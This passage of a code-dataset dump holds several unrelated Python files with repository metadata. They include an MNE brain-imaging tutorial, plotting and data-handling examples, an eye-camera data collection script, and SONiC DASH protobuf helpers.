src=src)\n\nlidx, tidx = np.unravel_index(np.argmax(label_tc), label_tc.shape)\nfig, ax = plt.subplots(1, layout=\"constrained\")\nax.plot(stc.times, label_tc.T, \"k\", lw=1.0, alpha=0.5)\nxy = np.array([stc.times[tidx], label_tc[lidx, tidx]])\nxytext = xy + [0.01, 1]\nax.annotate(label_names[lidx], xy, xytext, arrowprops=dict(arrowstyle=\"->\"), color=\"r\")\nax.set(xlim=stc.times[[0, -1]], xlabel=\"Time (s)\", ylabel=\"Activation\")\nfor key in (\"right\", \"top\"):\n ax.spines[key].set_visible(False)\n\n# %%\n# We can plot several labels with the most activation in their time course\n# for a more fine-grained view of the anatomical loci of activation.\nlabels = [\n label_names[idx]\n for idx in np.argsort(label_tc.max(axis=1))[:7]\n if \"unknown\" not in label_names[idx].lower()\n] # remove catch-all\nbrain = mne.viz.Brain(\n \"sample\",\n hemi=\"both\",\n surf=\"pial\",\n alpha=0.5,\n cortex=\"low_contrast\",\n subjects_dir=subjects_dir,\n)\nbrain.add_volume_labels(aseg=\"aparc+aseg\", labels=labels)\nbrain.show_view(azimuth=250, elevation=40, distance=400)\n\n# %%\n# And we can project these label time courses back to their original\n# locations and see how the plot has been smoothed:\n\nstc_back = mne.labels_to_stc(fname_aseg, label_tc, src=src)\nstc_back.plot(src, subjects_dir=subjects_dir, mode=\"glass_brain\")\n\n# %%\n# Vector Source Estimates\n# -----------------------\n# If we choose to use ``pick_ori='vector'`` in\n# :func:`apply_inverse `\nfname_inv = data_path / \"MEG\" / \"sample\" / \"sample_audvis-meg-oct-6-meg-inv.fif\"\ninv = read_inverse_operator(fname_inv)\nstc = apply_inverse(evoked, inv, lambda2, \"dSPM\", pick_ori=\"vector\")\nbrain = stc.plot(\n subject=\"sample\",\n subjects_dir=subjects_dir,\n initial_time=initial_time,\n brain_kwargs=dict(silhouette=True),\n smoothing_steps=7,\n)\n\n# %%\n# Dipole fits\n# -----------\n# For computing a dipole fit, we need to load the noise covariance, the BEM\n# solution, and the coregistration transformation files. Note that for the\n# other methods, these were already used to generate the inverse operator.\nfname_cov = meg_path / \"sample_audvis-cov.fif\"\nfname_bem = subjects_dir / \"sample\" / \"bem\" / \"sample-5120-bem-sol.fif\"\nfname_trans = meg_path / \"sample_audvis_raw-trans.fif\"\n\n##############################################################################\n# Dipoles are fit independently for each time point, so let us crop our time\n# series to visualize the dipole fit for the time point of interest.\nevoked.crop(0.1, 0.1)\ndip = mne.fit_dipole(evoked, fname_cov, fname_bem, fname_trans)[0]\n\n##############################################################################\n# Finally, we can visualize the dipole.\n\ndip.plot_locations(fname_trans, \"sample\", subjects_dir)\n","repo_name":"mne-tools/mne-python","sub_path":"tutorials/inverse/60_visualize_stc.py","file_name":"60_visualize_stc.py","file_ext":"py","file_size_in_byte":7302,"program_lang":"python","lang":"en","doc_type":"code","stars":2405,"dataset":"github-code","pt":"71"} +{"seq_id":"2006747369","text":"import pandas as pd\nimport numpy as np\nfrom pandas import DataFrame, Series\n\nemBranco = np.nan\nnp.random.seed(25)\ndf = DataFrame(np.random.rand(36).reshape(6, 6))\ndf.loc[3:5, 0] = emBranco\ndf.loc[1:4, 5] = emBranco\n\ncount = df.isnull().sum() #somando valores em branco do DataSet\n#Caso passar parametro Axis= 1, o resultado será de um DF sem colunas\ndrop = df.dropna(axis = 1) #apresentando apenas valores que não estão em branco\n\nprint(drop)","repo_name":"viniciusnatal/gotoDataScience","sub_path":"1. Manipulação de dados/04.removeralterarValoresBrancos.py","file_name":"04.removeralterarValoresBrancos.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32919051748","text":"import metview as mv\n\n# read GRIB forecast data\nfilename = \"joachim_pl.grib\"\nif mv.exist(filename):\n data = mv.read(filename)\nelse:\n data = mv.gallery.load_dataset(filename)\n\ndelta = 0.3\n# The vertical hovmoeller modules take an area as an input.\n# We define the location by shrinking down the area to a point,\n# using a delta adjusted to the grid resolution (0.5x0.5 degrees)\nloc = [47, 0] # lat/lon\narea = [loc[0] + delta, loc[1] - delta, loc[0] - delta, loc[1] + delta] # N/W/S/E\n\n# read temperature fields and convert from K to C\nt = mv.read(data=data, param=\"t\")\nt = t - 273.16\n\n# read u and v fields and computes wind speed\nu = mv.read(data=data, param=\"u\")\nv = mv.read(data=data, param=\"v\")\nsp = mv.sqrt(u ** 2 + v ** 2)\nsp = mv.grib_set_long(sp, [\"paramId\", 10])\n\n# define isoline shading for speed\nsp_cont = mv.mcont(\n legend=\"on\",\n contour=\"off\",\n contour_level_selection_type=\"interval\",\n contour_max_level=90,\n contour_min_level=0,\n contour_interval=10,\n contour_label=\"off\",\n contour_shade=\"on\",\n contour_shade_colour_method=\"palette\",\n contour_shade_method=\"area_fill\",\n contour_shade_palette_name=\"m_purple_9\",\n)\n\n# define contouring for t\nt_cont = mv.mcont(\n contour_line_style=\"dash\",\n contour_line_thickness=3,\n contour_line_colour=\"charcoal\",\n contour_highlight=\"off\",\n contour_level_selection_type=\"interval\",\n contour_interval=10,\n contour_label_height=0.4,\n)\n\n# define time axis\ntime_axis = mv.maxis(\n axis_type=\"date\",\n axis_tick_label_height=0.4,\n axis_date_type=\"hours\",\n axis_days_label_height=0.4,\n axis_hours_label=\"on\",\n axis_hours_label_quality=\"high\",\n axis_hours_label_height=0.3,\n)\n\n# define vertical axis\nvert_axis = mv.maxis(\n axis_tick_label_height=0.4, axis_title_text=\"Pressure (hPa)\", axis_title_height=0.5\n)\n\n# define hovmoeller view\nview = mv.mhovmoellerview(\n type=\"vertical_hovm\",\n bottom_level=1000,\n top_level=100,\n area=area,\n time_axis=time_axis,\n vertical_axis=vert_axis,\n subpage_y_position=5,\n)\n\n# define legend\nlegend = mv.mlegend(legend_text_font_size=0.3, legend_text_colour=\"charcoal\")\n\n# define title\ntitle = mv.mtext(text_font_size=0.4, text_colour=\"charcoal\")\n\n# define the output plot file\nmv.setoutput(mv.pdf_output(output_name=\"time_height_xs\"))\n\n# generate plot\nmv.plot(view, sp, sp_cont, t, t_cont, legend, title)\n","repo_name":"ecmwf/metview-docs","sub_path":"docs/gallery/time_height_xs.py","file_name":"time_height_xs.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"71"} +{"seq_id":"40430562113","text":"import time\nimport pandas as pd\nfrom selenium import webdriver as wd\n\ndef sakura():\n \n keyword = input(\"Type Item : \")\n url = 'https://sakurajapan.co.kr/hey/search?keyword={keyword}&type=buy'.format(keyword = keyword)\n \n driver = wd.Chrome(\n r\"C:\\Users\\Administrator\\Desktop\\Coding\\Python\\Scrap\\여행지 상품 크롤링\\chromedriver.exe\")\n driver.get(url)\n \n time.sleep(2)\n \n for i in range(20):\n name = driver.find_elements_by_css_selector('#title_{i}'.format(i=i))\n print(i, name[0].text)\n print('end')\n \n ","repo_name":"DalkomCandy/Python","sub_path":"04. Crawling/Travel/sakura.py","file_name":"sakura.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14072110222","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport time\nimport h5py\nimport argparse\nimport datetime\nimport platform\nimport os\nimport numpy as np \nimport cv2\n\n#*********constants**********#\n#original frame dimensions\nORIGINAL_HEIGHT = 480\nORIGINAL_WIDTH = 848\nORIGINAL_CHANNLES = 3\n#cropped frame dimensions\nIMAGE_HEIGHT = 256\nIMAGE_WIDTH = 512\nIMAGE_CHANNELS = 90\n#focusing camera\nAUTO_FOCUS_1 = 'uvcdynctrl -d video'\nAUTO_FOCUS_2 = ' --set=\\'Focus, Auto\\' '\nSET_FOCUS_1 = 'uvcdynctrl --device=video'\nSET_FOCUS_2 = ' --set=\\'Focus (absolute)\\' '\nFOCUL_CONTINUITY = 5\nFOCUS_ATTEMPTS = 5\nBLUR_ERROR = 3\nPRESET_OPTIMAL_FOCUS = 31\n#other\nDISCARDED_FRAME_COUNT = 100\nMAX_TASK_ID = 10\nDATAPATH = \"/home/tharindu/Desktop/black/data/eyeknowyou\"\n#****************************#\n\n#*********variables**********#\ntask_id = 0\n#****************************#\n\n#**********methods***********#\ndef checkDevice():\n\tdevice_name = platform.node()\n\tprocessor_architecture = platform.machine()\n\tprint(\"\\nEyeKnowYou data collection session initiated...\")\n\tprint(\"Checking System Iformation...\")\n\tprint(\"Computer Name:\" + str(device_name))\n\tprint(\"Instruction Architechture:\" + str(processor_architecture))\n\tprint(\"*******************************************\")\n\tdevice_compatibility = True #change the logic later *****\n\treturn device_compatibility\n\ndef identifyCorrectCamera():\n\treturn 2\n\ndef disableDefaultAutofocus(camera):\n\tauto_focus = 0\n\tAUTO_FOCUS = AUTO_FOCUS_1 + str(camera) + AUTO_FOCUS_2 + str(auto_focus)\n\tresponse = os.popen(AUTO_FOCUS).read()\n\tprint(\"------------------------------------------------------\")\n\tprint(response)\n\tprint(\"if no error messege was printed just below dash line, succesfully disabled autofocus\\n\")\n\ndef enableDefaultAutofocus(camera):\n\tauto_focus = 1\n\tAUTO_FOCUS = AUTO_FOCUS_1 + str(camera) + AUTO_FOCUS_2 + str(auto_focus)\n\tresponse = os.popen(AUTO_FOCUS).read()\n\tprint(\"------------------------------------------------------\")\n\tprint(response)\n\tprint(\"if no error messege was printed just below dash line, succesfully enabled autofocus\\n\")\n\ndef set_focus(camera, focus_level):\n\tSET_FOCUS = SET_FOCUS_1 + str(camera) + SET_FOCUS_2 + str(focus_level)\n\tfocus_resoponse = os.popen(SET_FOCUS).read()\n\ndef manualAutofucus(camera, cap, search_range=5):\n\tincrement = 1\n\tcount = 0\n\tmax_sharpness = 0\n\tbest_focus = PRESET_OPTIMAL_FOCUS\n\tcurrent_focus = best_focus - search_range - 1\n\twhile(True):\n\t\tcount = count + 1\n\t\tret, original_frame = cap.read()\n\t\tgray_frame = cv2.cvtColor(np.uint8(original_frame), cv2.COLOR_BGR2GRAY)\n\t\tcv2.imshow(\"Fucusing\", gray_frame)\n\t\tj = cv2.waitKey(2)\n\t\tif(j == 27):\n\t\t\tbreak\n\t\tcurrent_focus = current_focus + increment\n\t\tset_focus(camera, current_focus)\n\t\tsharpness = cv2.Laplacian(gray_frame, cv2.CV_64F).var()\n\t\tif(sharpness > max_sharpness):\n\t\t\tmax_sharpness = sharpness\n\t\t\tbest_focus = current_focus\n\t\t\tcontinue\n\t\t# else:\n\t\t# \tcurrent_focus = best_focus + search_range\n\t\t# \tincrement = increment * -1\n\t\tif(count > search_range * 2):\n\t\t\tbreak\n\tset_focus(camera, best_focus)\n\tprint(\"Focus point = \" + str(best_focus))\n\tprint(\"Max sharpness = \" + str(max_sharpness))\n\treturn max_sharpness\n\ndef configureCamera():\n\tcamera = identifyCorrectCamera()\n\tdisableDefaultAutofocus(camera)\n\treturn True, camera\n\ndef detectPupil(cap):\n\tsearch_range = 20\n\tmax_sharpness = manualAutofucus(camera, cap, search_range)\n\tpupil_x = 0\n\tpupil_y = 0\n\treturn pupil_x, pupil_y\n\ndef detectCenter(frame, cap):\n\tdetectPupil(cap)\n\tx_center = 0\n\ty_center = 0\n\treturn (x_center, y_center)\n\ndef cropped(frame, center):\n\tx_center, y_center = center\n\tx1 = x_center - int(IMAGE_HEIGHT / 2)\n\tx2 = x_center + int(IMAGE_HEIGHT / 2)\n\ty1 = y_center - int(IMAGE_WIDTH / 2)\n\ty2 = y_center + int(IMAGE_WIDTH / 2)\n\tif(x1 < 0):\n\t\tx1 = 0\n\t\tx2 = IMAGE_HEIGHT\n\tif(y1 < 0):\n\t\ty1 = 0\n\t\ty2 = IMAGE_WIDTH\n\tif(x2 > ORIGINAL_HEIGHT):\n\t\tx2 = ORIGINAL_HEIGHT\n\t\tx1 = ORIGINAL_HEIGHT - IMAGE_HEIGHT\n\tif(y2 > ORIGINAL_WIDTH):\n\t\ty2 = ORIGINAL_WIDTH\n\t\ty1 = ORIGINAL_WIDTH - IMAGE_WIDTH\n\tcropped_frame = frame[x1:x2, y1:y2].copy()\n\treturn cropped_frame\n\ndef runTask(task_id, user, wireless, camera):\n\tframe_list = []\n\tuser_list = []\n\ttask_list = []\n\ttimestamp_list = []\n\tif(wireless):\n\t\tpass\n\telse:\n\t\tcap = cv2.VideoCapture(camera)\n\t\tfor i in range(1, DISCARDED_FRAME_COUNT):\n\t\t\tret, original_frame = cap.read()\n\t\tgray_frame = cv2.cvtColor(np.uint8(original_frame), cv2.COLOR_BGR2GRAY)\n\t\tprint(\"Original frame size = \" + str(gray_frame.shape))\n\t\tcenter = detectCenter(gray_frame, cap)\n\t\twhile(True):\n\t\t\tret, original_frame = cap.read()\n\t\t\tgray_frame = cv2.cvtColor(np.uint8(original_frame), cv2.COLOR_BGR2GRAY)\n\t\t\tcv2.imshow(\"Original Frame\", gray_frame)\n\t\t\tframe = cropped(gray_frame, center)\n\t\t\tcv2.imshow(\"Current Frame\", frame)\n\t\t\tj = cv2.waitKey(2)\n\t\t\tif(j == 27):\n\t\t\t\tbreak\n\t\t\tdatetime_object = datetime.datetime.now()\n\t\t\tframe_list.append(frame)\n\t\t\tuser_list.append(user)\n\t\t\ttask_list.append(task_id)\n\t\t\ttimestamp_list.append(datetime_object.timestamp())\n\tcap.release()\n\tcv2.destroyAllWindows()\n\tstopTask()\n\treturn frame_list, user_list, task_list, timestamp_list\t\n\ndef createDatafile(datapath):\n\tframe_shape = (IMAGE_HEIGHT, IMAGE_WIDTH)\n\tuser_shape = (1,2)\n\ttask_shape = (1,1)\n\ttime_shape = (1,1)\n\tdt = h5py.string_dtype(encoding='ascii')\n\twith h5py.File(datapath, mode='a') as h5f:\n\t\tframe_dset = h5f.create_dataset('FRAMES', (0,) + frame_shape, maxshape=(None,) + frame_shape, dtype='uint8', chunks=(128,) + frame_shape)\n\t\tuser_dset = h5f.create_dataset('USERS', (0,) + user_shape, maxshape=(None,) + user_shape, dtype='int32', chunks=(128,) + user_shape)\n\t\ttask_dset = h5f.create_dataset('TASKS', (0,) + task_shape, maxshape=(None,) + task_shape, dtype='int32', chunks=(128,) + task_shape)\n\t\ttime_dset = h5f.create_dataset('TIMES', (0,) + time_shape, maxshape=(None,) + time_shape, dtype='int32', chunks=(128,) + time_shape)\n\ndef saveData(datapath, frame_list, user_list, task_list, timestamp_list):\n\twith h5py.File(datapath, mode='a') as h5f:\n\t\tframe_dset = h5f['FRAMES']\n\t\tuser_dset = h5f['USERS']\n\t\ttask_dset = h5f['TASKS']\n\t\ttime_dset = h5f['TIMES']\n\t\tfor i in range(frame_list.shape[0]):\n\t\t\tframe_dset.resize(frame_dset.shape[0]+1, axis=0)\n\t\t\tframe_dset[-1:] = frame_list[i]\n\t\t\tprint(frame_dset.shape)\n\t\tfor i in range(user_list.shape[0]):\n\t\t\tuser_dset.resize(user_dset.shape[0]+1, axis=0)\n\t\t\tuser_dset[-1:] = user_list[i]\n\t\t\tprint(user_dset.shape)\n\t\tfor i in range(task_list.shape[0]):\n\t\t\ttask_dset.resize(task_dset.shape[0]+1, axis=0)\n\t\t\ttask_dset[-1:] = task_list[i]\n\t\t\tprint(task_dset.shape)\n\t\tfor i in range(timestamp_list.shape[0]):\n\t\t\ttime_dset.resize(time_dset.shape[0]+1, axis=0)\n\t\t\ttime_dset[-1:] = timestamp_list[i]\n\t\t\tprint(time_dset.shape)\n\n\ndef stopTask():\n\tprint(\"Data recording terminated. Saving data file....\")\n\ndef endSession():\n\tprint(\"Session terminated. Thank You!\")\n\ndef printTask(task_id):\n\tif(task_id == 0):\n\t\tprint(\"--Unlabeled Data Recording--\")\n\telif(task_id == 1):\n\t\tprint(\"--YouTube Funny Video - Smartphone--\")\n\telse:\n\t\tprint(\"--Unknown Task--\")\n#****************************#\n\n#************body************#\n#arguements \nparser = argparse.ArgumentParser()\nparser.add_argument('--labels', action=\"store\", type=np.bool, default=True) #optional \nparser.add_argument('--wireless', action=\"store\", type=np.bool, default=False) #required\nargs = parser.parse_args()\nlabels = args.labels\nwireless = args.wireless\n\ndevice_compatible = checkDevice()\ncamera_configured, camera = configureCamera()\n\nwhile True:\n try:\n user = int(input(\"\\nEnter User ID: \"))\n except ValueError:\n print(\"Sorry, User ID should be an integer.\")\n continue\n else:\n \tprint(\"\\nUser ID: \" + str(user) + \" has been registered:\")\n \tif(input(\"Do you wish to continue? (y/n): \") in ['y','Y']): \n \tbreak\n \telse:\n \t\tcontinue\n\nwhile(True):\n\tif(camera_configured and device_compatible):\n\t\tif(labels):\n\t\t\twhile True:\n\t\t\t try:\n\t\t\t task_id = int(input(\"\\nEnter Task ID: \"))\n\t\t\t except ValueError:\n\t\t\t print(\"Sorry, Task ID should be an integer.\")\n\t\t\t continue\n\t\t\t else:\n\t\t\t \tprint(\"\\nFollowing task has been registered:\")\n\t\t\t \tprintTask(task_id)\n\t\t\t \tif(input(\"Do you wish to continue? (y/n): \") in ['y','Y']): \n\t\t\t \tbreak\n\t\t\t \telse:\n\t\t\t \t\tcontinue\n\t\telse:\n\t\t\tprint(\"--Unlabeled Data Recording--\")\n\t\t\ttask_id = 0\n\n\tframe_list, user_list, task_list, timestamp_list = runTask(task_id, user, wireless, camera)\n\tdatetime_object = datetime.datetime.now()\n\tdatapath = DATAPATH + \" user_\" + str(user) + \" \" + \"task_\" + str(task_id) + \" \" + str(datetime_object) + \".h5\"\n\tcreateDatafile(datapath)\n\tsaveData(datapath, np.asarray(frame_list), np.asarray(user_list), np.asarray(task_list), np.asarray(timestamp_list))\n\tif(input(\"\\nDo you wish to record another task? (y/n): \") in ['y','Y']): \n\t\tcontinue\n\telse:\n\t\tendSession()\n\t\tbreak\n#****************************#","repo_name":"tikzoxs/EyeKnowYouSSL","sub_path":"collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":8861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74617802789","text":"class AsciiTable:\n\n def __init__(self, data=[], header=True, separateLines=False):\n PRECISION = 4\n \n self.data = []\n self.colomnWidth = []\n\n for row in data:\n newRow = []\n \n for i, item in enumerate(row):\n if type(item) is float:\n item = round(item, PRECISION)\n \n value = str(item)\n newRow.append(value)\n\n if i < len(self.colomnWidth):\n self.colomnWidth[i] = max(len(value), self.colomnWidth[i])\n else:\n self.colomnWidth.append(len(value))\n\n self.data.append(newRow)\n\n self.charMap = {\n 'top' : '-',\n 'left' : '|',\n 'corner' : '+'\n }\n self.padding = 1\n\n self.header = header\n self.separateLines = separateLines\n \n self.highlightedRowIndex = None\n self.highlightedColIndex = None\n\n def highlightRow(self, index):\n self.highlightedRowIndex = index\n \n def highlightCol(self, index):\n self.highlightedColIndex = index\n\n def __str__(self):\n\n chars = self.charMap\n HIGHLIGHT_ROW = \"-->\"\n HIGHLIGHT_COL = \"^\\n|\\n|\"\n\n def _getHorizontalLine():\n result = chars['corner']\n\n for width in self.colomnWidth:\n result += chars['top'] * (width + 2 * self.padding) + chars['corner']\n\n return result\n\n def _getRowWithData(data):\n result = chars['left']\n\n for i in range(len(self.colomnWidth)):\n width = self.colomnWidth[i] + self.padding\n formatStr = '{:>' + str(width) + '}' + (' ' * self.padding)\n\n if i < len(data):\n result += formatStr.format(data[i])\n else:\n result += formatStr.format('')\n\n result += chars['left']\n\n return result\n\n def _getLinePrefix(i):\n highlightRowEnabled = not self.highlightedRowIndex is None\n if not highlightRowEnabled:\n return \"\"\n \n PREFIX = \" \" * len(HIGHLIGHT_ROW)\n\n if i == self.highlightedRowIndex:\n return HIGHLIGHT_ROW\n else:\n return PREFIX\n\n def _getColHighlightFooter(highlightedCol, linePrefix = \"\"):\n widths = [2 * self.padding + 1 + w for w in self.colomnWidth]\n widths = widths[:highlightedCol]\n\n markerPos = sum(widths) + 1\n\n markerPos += self.padding + self.colomnWidth[highlightedCol] // 2\n\n footer = \"\"\n marker = HIGHLIGHT_COL.split(\"\\n\")\n \n for char in marker:\n footer += linePrefix + \" \" * markerPos + char + \"\\n\"\n\n return footer\n\n highlightColEnabled = not self.highlightedColIndex is None\n\n output = _getLinePrefix(-1) + _getHorizontalLine() + '\\n'\n\n lastI = len(self.data) - 1\n for i, row in enumerate(self.data):\n output += _getLinePrefix(i) + _getRowWithData(row) + '\\n'\n\n if (i == 0 and self.header) or (self.separateLines) or (i == lastI):\n output += _getLinePrefix(-1) + _getHorizontalLine() + '\\n'\n\n if highlightColEnabled:\n output += _getColHighlightFooter(self.highlightedColIndex, _getLinePrefix(-1))\n\n return output\n","repo_name":"File5/stat-work","sub_path":"asciitable.py","file_name":"asciitable.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19288350905","text":"import re\nimport socket\nimport ipaddress\nimport uuid\nimport pytest\n\nfrom dash_api.appliance_pb2 import Appliance\nfrom dash_api.vnet_pb2 import Vnet\nfrom dash_api.eni_pb2 import Eni, State\nfrom dash_api.qos_pb2 import Qos\nfrom dash_api.route_pb2 import Route\nfrom dash_api.route_rule_pb2 import RouteRule\nfrom dash_api.vnet_mapping_pb2 import VnetMapping\nfrom dash_api.route_type_pb2 import RoutingType, ActionType, RouteType, RouteTypeItem\nfrom dash_api.types_pb2 import IpVersion, IpPrefix, ValueOrRange\nfrom dash_api.acl_group_pb2 import AclGroup\nfrom dash_api.acl_out_pb2 import AclOut\nfrom dash_api.acl_in_pb2 import AclIn\nfrom dash_api.acl_rule_pb2 import AclRule, Action\n\n\nENABLE_PROTO = True\n\n\ndef appliance_from_json(json_obj):\n pb = Appliance()\n pb.sip.ipv4 = socket.htonl(int(ipaddress.IPv4Address(json_obj[\"sip\"])))\n pb.vm_vni = int(json_obj[\"vm_vni\"])\n return pb\n\n\ndef vnet_from_json(json_obj):\n pb = Vnet()\n pb.vni = int(json_obj[\"vni\"])\n pb.guid.value = bytes.fromhex(uuid.UUID(json_obj[\"guid\"]).hex)\n return pb\n\n\ndef vnet_mapping_from_json(json_obj):\n pb = VnetMapping()\n pb.action_type = RoutingType.ROUTING_TYPE_VNET_ENCAP\n pb.underlay_ip.ipv4 = socket.htonl(int(ipaddress.IPv4Address(json_obj[\"underlay_ip\"])))\n pb.mac_address = bytes.fromhex(json_obj[\"mac_address\"].replace(\":\", \"\"))\n pb.use_dst_vni = json_obj[\"use_dst_vni\"] == \"true\"\n return pb\n\n\ndef qos_from_json(json_obj):\n pb = Qos()\n pb.qos_id = json_obj[\"qos_id\"]\n pb.bw = int(json_obj[\"bw\"])\n pb.cps = int(json_obj[\"cps\"])\n pb.flows = int(json_obj[\"flows\"])\n return pb\n\n\ndef eni_from_json(json_obj):\n pb = Eni()\n pb.eni_id = json_obj[\"eni_id\"]\n pb.mac_address = bytes.fromhex(json_obj[\"mac_address\"].replace(\":\", \"\"))\n pb.underlay_ip.ipv4 = socket.htonl(int(ipaddress.IPv4Address(json_obj[\"underlay_ip\"])))\n pb.admin_state = State.STATE_ENABLED if json_obj[\"admin_state\"] == \"enabled\" else State.STATE_DISABLED\n pb.vnet = json_obj[\"vnet\"]\n pb.qos = json_obj[\"qos\"]\n return pb\n\n\ndef route_from_json(json_obj):\n pb = Route()\n if json_obj[\"action_type\"] == \"vnet\":\n pb.action_type = RoutingType.ROUTING_TYPE_VNET\n pb.vnet = json_obj[\"vnet\"]\n elif json_obj[\"action_type\"] == \"vnet_direct\":\n pb.action_type = RoutingType.ROUTING_TYPE_VNET_DIRECT\n pb.vnet_direct.vnet = json_obj[\"vnet\"]\n pb.vnet_direct.overlay_ip.ipv4 = socket.htonl(int(ipaddress.IPv4Address(json_obj[\"overlay_ip\"])))\n elif json_obj[\"action_type\"] == \"direct\":\n pb.action_type = RoutingType.ROUTING_TYPE_DIRECT\n else:\n pytest.fail(\"Unknown action type %s\" % json_obj[\"action_type\"])\n return pb\n\n\ndef route_rule_from_json(json_obj):\n pb = RouteRule()\n pb.action_type = RoutingType.ROUTING_TYPE_VNET_ENCAP\n pb.priority = int(json_obj[\"priority\"])\n pb.pa_validation = json_obj[\"pa_validation\"] == \"true\"\n if json_obj[\"pa_validation\"] == \"true\":\n pb.vnet = json_obj[\"vnet\"]\n return pb\n\n\ndef routing_type_from_json(json_obj):\n pb = RouteType()\n pbi = RouteTypeItem()\n pbi.action_name = json_obj[\"name\"]\n pbi.action_type = ActionType.ACTION_TYPE_MAPROUTING\n pb.items.append(pbi)\n return pb\n\n\ndef acl_group_from_json(json_obj):\n pb = AclGroup()\n pb.guid.value = bytes.fromhex(uuid.UUID(json_obj[\"guid\"]).hex)\n pb.ip_version = IpVersion.IP_VERSION_IPV4\n return pb\n\n\ndef acl_out_from_json(json_obj):\n pb = AclOut()\n pb.v4_acl_group_id = json_obj[\"acl_group_id\"]\n return pb\n\n\ndef acl_in_from_json(json_obj):\n pb = AclIn()\n pb.v4_acl_group_id = json_obj[\"acl_group_id\"]\n return pb\n\n\ndef acl_rule_from_json(json_obj):\n pb = AclRule()\n pb.priority = int(json_obj[\"priority\"])\n pb.action = Action.ACTION_DENY if json_obj[\"action\"] == \"deny\" else Action.ACTION_PERMIT\n pb.terminating = json_obj[\"terminating\"] == \"true\"\n if \"src_addr\" in json_obj:\n for addr in json_obj[\"src_addr\"].split(','):\n net = ipaddress.IPv4Network(addr, False)\n ip = IpPrefix()\n ip.ip.ipv4 = socket.htonl(int(net.network_address))\n ip.mask.ipv4 = socket.htonl(int(net.netmask))\n pb.src_addr.append(ip)\n if \"dst_addr\" in json_obj:\n for addr in json_obj[\"dst_addr\"].split(','):\n net = ipaddress.IPv4Network(addr, False)\n ip = IpPrefix()\n ip.ip.ipv4 = socket.htonl(int(net.network_address))\n ip.mask.ipv4 = socket.htonl(int(net.netmask))\n pb.dst_addr.append(ip)\n if \"src_port\" in json_obj:\n for port in json_obj[\"src_port\"].split(','):\n vr = ValueOrRange()\n if \"-\" not in port:\n vr.value = int(port)\n else:\n vr.range.min = int(port.split('-')[0])\n vr.range.max = int(port.split('-')[1])\n pb.src_port.append(vr)\n if \"dst_port\" in json_obj:\n for port in json_obj[\"dst_port\"].split(','):\n vr = ValueOrRange()\n if \"-\" not in port:\n vr.value = int(port)\n else:\n vr.range.min = int(port.split('-')[0])\n vr.range.max = int(port.split('-')[1])\n pb.dst_port.append(vr)\n if \"protocol\" in json_obj:\n for proto in json_obj[\"protocol\"].split(','):\n pb.protocol.append(int(proto))\n return pb\n\n\nhandlers_map = {\n \"APPLIANCE\": appliance_from_json,\n \"VNET\": vnet_from_json,\n \"VNET_MAPPING\": vnet_mapping_from_json,\n \"QOS\": qos_from_json,\n \"ENI\": eni_from_json,\n \"ROUTE\": route_from_json,\n \"ROUTE_RULE\": route_rule_from_json,\n \"ROUTING_TYPE\": routing_type_from_json,\n \"ACL_GROUP\": acl_group_from_json,\n \"ACL_OUT\": acl_out_from_json,\n \"ACL_IN\": acl_in_from_json,\n \"ACL_RULE\": acl_rule_from_json,\n}\n\n\ndef json_to_proto(key, json_obj):\n table_name = re.search(r\"DASH_(\\w+)_TABLE\", key).group(1)\n if table_name in handlers_map:\n pb = handlers_map[table_name](json_obj)\n else:\n pytest.fail(\"Unknown table %s\" % table_name)\n return pb.SerializeToString()\n","repo_name":"Cisco-8000-sonic/sonic-mgmt_1","sub_path":"tests/dash/proto_utils.py","file_name":"proto_utils.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"34097470902","text":"margin = 20\ngrid_size = 500\nperms = ((0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0))\n\ndef setup():\n size(1500, 1000)\n text_align(LEFT, CENTER)\n background(128)\n no_stroke()\n for n in range(3):\n grid(margin, margin, grid_size - margin * 2, 4, perms[n])\n with push_matrix():\n translate(0, grid_size)\n grid(margin, margin, grid_size - margin * 2, 4, perms[n + 3])\n translate(grid_size, 0)\n save('out_0.png')\n\ndef grid(xo, yo, largura_total, n, perm):\n w = largura_total / n\n color_step = 255 / n\n half_step = color_step / 2\n text_size(w / 8)\n text_leading(w / 9)\n for j in range(n):\n x = xo + w * j + w / 2\n for i in range(n):\n y = yo + w * i + w / 2\n a = round(half_step + i * color_step)\n b = round(half_step + j * color_step) \n c = round(255 - i * color_step -half_step)\n R, G, B = (a, b, c)[perm[0]], (a, b, c)[perm[1]], (a, b, c)[perm[2]] \n fill(R, G, B) \n circle(x, y, w * 0.98)\n fill(255)\n text(f'R:{R}\\nG:{G}\\nB:{B}\\n', x, y) \n \n","repo_name":"villares/sketch-a-day","sub_path":"2023/sketch_2023_04_03/sketch_2023_04_03_0.py","file_name":"sketch_2023_04_03_0.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"71"} +{"seq_id":"9909560993","text":"import sqlite3\n\n\nclass SVGDatabase:\n DEFAULT_GIFT_TABLE_NAME = \"gifts\"\n DEFAULT_ITEM_TABLE_NAME = \"items\"\n DEFAULT_ITEM_ATTRIBUTES_TABLE_NAME = \"item_attributes\"\n\n def __init__(self,\n database_path,\n gift_table_name=DEFAULT_GIFT_TABLE_NAME,\n item_attributes_table_name=DEFAULT_ITEM_ATTRIBUTES_TABLE_NAME):\n\n self.gift_table_name = gift_table_name\n self.item_attributes_table_name = item_attributes_table_name\n\n self.database_path = database_path\n self.conn = None\n self.cursor = self.get_cursor()\n\n self.build_all(self.cursor)\n\n def write_reactions(self, reactions):\n statement = \"INSERT INTO {} VALUES(?, ?, ?)\" \\\n .format(self.gift_table_name)\n args = [(x.villager, x.item, 